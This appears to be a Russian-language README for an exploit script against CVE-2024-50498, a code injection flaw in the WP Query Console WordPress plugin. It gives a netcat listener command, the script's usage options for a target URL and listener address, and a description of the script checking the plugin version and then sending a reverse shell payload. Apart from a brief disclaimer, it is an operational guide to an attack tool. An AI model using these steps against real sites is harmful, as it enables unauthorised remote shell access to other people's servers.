
Эксплойт-скрипт для инъекции кода CVE-2024-50498 в WordPress WP Query Console, который проверяет уязвимость и доставляет reverse shell.
Уязвимость некорректного контроля генерации кода ('Code Injection') в LUBUS WP Query Console допускает внедрение кода. Эта проблема затрагивает WP Query Console: с n/a по 1.0.
Откройте терминал на вашей машине и запустите Netcat-слушатель, чтобы ожидать обратное соединение (reverse shell).
nc -lvnp <PORT>
usage: CVE-2024-50498.py [-h] -u URL -ip LISTENER_IP -P PORT
wordpress | Improper Control of Generation of Code ('Code Injection') vulnerability in LUBUS WP Query Console allows Code
Injection.This issue affects WP Query Console: from n/a through 1.0. script Exploit by: Nxploit Khaled_alenazi This script
is provided for educational purposes only. The author is not responsible for any damages caused by the misuse of this
script.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL (e.g., http://example.com/wordpress)
-ip LISTENER_IP, --listener_ip LISTENER_IP
Your IP address for listening.
-P PORT, --port PORT Your listening port.
После запуска команды следите за терминалом Netcat для получения обратного соединения.
Скрипт сначала проверит, уязвим ли сайт, проверив версию плагина. Если сайт уязвим, он отправит полезную нагрузку (payload) для запуска обратной оболочки. В случае успеха проверьте ваш терминал Netcat на наличие соединения с оболочкой.